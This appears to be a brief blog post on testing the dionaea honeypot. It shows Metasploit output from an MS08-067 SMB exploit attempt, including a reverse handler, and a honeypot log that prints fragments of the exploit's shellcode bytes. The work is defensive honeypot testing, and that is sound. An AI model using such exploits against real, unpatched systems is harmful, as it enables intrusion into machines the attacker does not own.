Now that I got a basic handle on dionaea’s configuration, running exploits on it is next.
I learned from various readins that dionaea is good with CIFS/SMB attacks, so I started there.
Loaded metasploit up and exploited….
[*] Started reverse handler on XXX.XXX.XXX.XXX:4444 [*] Automatically detecting the target... [*] Fingerprint: Windows XP - Service Pack 2 - lang:English [*] Selected Target: Windows XP SP2 English (AlwaysOn NX) [*] Attempting to trigger the vulnerability... [-] Exploit failed: Rex::Proto::SMB::Exceptions::NoReply The SMB server did not reply to our request
As, expected, the exploit didn’t run, but I did get copious amounts of feedback on the honeypot. Here’s a clip.
[29112012 19:25:40] rpcservices dionaea/smb/rpcservices.py:76-info: Calling SRVSVC NetPathCanonicalize (1f) maybe MS08-67 exploit? [29112012 19:25:40] rpcservices dionaea/smb/rpcservices.py:3453-debug: ref 0xb5f742c3 server_unc b'P\x00E\ x00T\x00C\x00U\x00N\x00\x00\x00' path b'\\\x00fywVqBYtwRowYwSoZJrhCkuIjHhVhuJluLLyzsttTNgEtMHPmBFayICEHlaQ DqupARoNZMsemWPoOpcHPzeaZbhAYpCzNaKaPNWk\'\x05\x9bF\xe0\x08\xd6\x90\xb2\xa8<g-\x98\x99$,IA"\xe1+\xf5\x93f\ x92O\xba\xeb\x04\xfd\xa9q \xfc\xf9\xb5=\xbeC7\xb6J?\xb3\xb4KH\xb7\x14\x9f\xbf\x97B)\xf8\xd4%\xb15\x1d\x8d\ xb9G4\x1c\x91\xfc\xbb\xca\x8b\x1aW\xeb\x0c^V1\x1e\xad\x01\xc3\x85\xc0u\xf7\xc3\xe8\xef\xff\xff\xffKON
Clearly, the honeypot had a clue that the MS08-067 exploit was being used. It may have not recognized any payload, but that’s ok.
Success!